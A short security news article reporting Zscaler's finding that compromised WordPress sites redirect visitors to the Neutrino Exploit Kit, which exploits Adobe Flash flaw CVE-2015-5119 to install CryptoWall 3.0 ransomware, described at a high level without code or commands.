WordPress sites redirect to Neutrino EK, CryptoWall pushed via Flash exploit

Neutrino Exploit Kit has been observed targeting CVE-2015-5119, an Adobe Flash Player zero-day vulnerability.
Neutrino Exploit Kit has been observed targeting CVE-2015-5119, an Adobe Flash Player zero-day vulnerability.

Zscaler has identified a campaign involving compromised WordPress websites redirecting visitors to the Neutrino Exploit Kit, which then serves up CryptoWall 3.0 ransomware by means of a recently patched Adobe Flash Player vulnerability.

The security firm has observed attackers targeting WordPress sites running version 4.2 and lower, and so far, researchers observed 2,600 unique WordPress websites being used in the operation, a Thursday post indicated.

Deepen Desai, director of security research with Zscaler, told SCMagazine.com in a Friday email correspondence that this appears to be an automated attack on WordPress sites.

“We haven't confirmed this yet, but it appears to be a combination of JetPack plugin (installed by default in those versions) Cross Site Scripting and CForms plugin 14.7 and an earlier arbitrary code execution vulnerability – CVE-2014-9473,” Desai said.

The attackers are fully compromising the WordPress sites, meaning they add a webshell and steal credentials before injecting the iFrame that loads the Neutrino Exploit Kit landing page, the post said, adding that the code only targets Internet Explorer users.

Neutrino Exploit Kit has been observed targeting CVE-2015-5119, an Adobe Flash Player vulnerability in the ActionScript3 ByteArray class. The flaw was identified as a zero-day bug in the Hacking Team leak and was quickly added into a variety of exploit kits.

“Successful exploitation of a victim leads to an encrypted executable download,” the post said. “The binary is decrypted and begins beaconing almost immediately. Looking at the traffic, we can immediately see this is CryptoWall 3.0. Sure enough, a couple minutes later we see the all too familiar 'HELP_DECRYPT' page and see connections out to the payment servers.”

You must be a registered member of SC Magazine to post a comment.

Sign up to our newsletters

TOP COMMENTS